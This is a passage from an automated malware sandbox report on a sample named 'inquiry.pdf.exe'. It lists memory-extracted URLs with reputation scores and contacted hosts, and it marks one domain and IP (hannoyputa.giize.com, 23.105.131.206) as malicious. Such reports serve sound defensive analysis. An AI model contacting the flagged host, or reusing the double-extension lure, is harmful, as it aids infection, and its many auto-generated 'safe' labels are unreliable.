            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cnT0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.fontbureau.comrz0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.founder.com.cn/cnt-b0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.carterandcone.comize0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/60%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fontbureau.comony/O0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/Y0f0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y0f0%VirustotalBrowse
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.founder.com.cn/cn4j40%Avira URL Cloudsafe
            hannoyputa.giize.com0%Avira URL Cloudsafe
            http://www.carterandcone.comintTV0%Avira URL Cloudsafe
            http://www.fontbureau.comav0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.fontbureau.com.TTF0%URL Reputationsafe
            http://www.fontbureau.comR.TTF0%URL Reputationsafe
            http://www.fontbureau.comB.TTFd0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y0%URL Reputationsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.carterandcone.comTC0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/O0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.fontbureau.comd0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.carterandcone.comIta0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/v0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/s-e0%URL Reputationsafe
            http://www.fontbureau.comm0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.zhongyicts.com.cno.0%URL Reputationsafe
            http://www.founder.com.cn/cn&0%URL Reputationsafe
            http://www.fontbureau.comsief0%URL Reputationsafe
            http://ns.adobe.c/gImt0%Avira URL Cloudsafe
            http://www.fontbureau.comI.TTF60%Avira URL Cloudsafe
            http://www.fontbureau.comdva0%Avira URL Cloudsafe
            http://ns.ado/1Imt0%Avira URL Cloudsafe
            http://www.fontbureau.comalsF50%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/ueT0%Avira URL Cloudsafe
            http://www.fontbureau.comdv0%Avira URL Cloudsafe
            http://www.carterandcone.como.(0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y0=0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/vad0%Avira URL Cloudsafe
            http://www.carterandcone.commbe0%Avira URL Cloudsafe
            http://www.carterandcone.comers0%Avira URL Cloudsafe
            http://www.carterandcone.comgo0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/nyg0%Avira URL Cloudsafe
            http://ns.adobe.cobjImt0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/k-u0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            hannoyputa.giize.com
            		23.105.131.206
            		truetrueunknown
            www.google.com
            		142.250.203.100
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              hannoyputa.giize.comtrue
              • Avira URL Cloud: safe
              		unknown
              https://www.google.com/false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.fontbureau.com/designersGinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.founder.com.cn/cnQinquiry.pdf.exe, 00000000.00000003.261220547.0000000006521000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/?inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.carterandcone.comizeinquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.founder.com.cn/cn/bTheinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.founder.com.cn/cnTinquiry.pdf.exe, 00000000.00000003.261348606.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.tiro.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261663692.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersinquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersZinquiry.pdf.exe, 00000000.00000003.267507239.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267605251.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.goodfont.co.krinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.cominquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comrzinquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297641323.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297186585.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sajatypeworks.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-jones.html4j-inquiry.pdf.exe, 00000000.00000003.268808715.000000000652D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268232591.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268609542.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268447326.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cnt-binquiry.pdf.exe, 00000000.00000003.261348606.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.google.cominquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comony/Oinquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268869519.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cn/cTheinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0finquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlIinquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.galapagosdesign.com/staff/dennis.htminquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designerslinquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/6inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265844488.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265956637.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn4j4inquiry.pdf.exe, 00000000.00000003.261323232.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comavinquiry.pdf.exe, 00000000.00000003.298903445.000000000654F000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.306760136.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.298246614.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.312562087.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297641323.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297909896.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297186585.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.298549688.000000000654E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.carterandcone.comintTVinquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.galapagosdesign.com/DPleaseinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/Y0inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fonts.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmln-uOinquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.urwpp.deDPleaseinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cninquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameinquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sakkal.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com.TTFinquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comB.TTFdinquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.comR.TTFinquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://ns.adobe.c/gImtglonkjhg.exe, 00000012.00000003.394602968.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.392396802.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://ns.ado/1Imtglonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/ueTinquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/Yinquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comdvinquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/inquiry.pdf.exe, 00000000.00000003.274291319.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comTCinquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Oinquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/jp/inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comdinquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
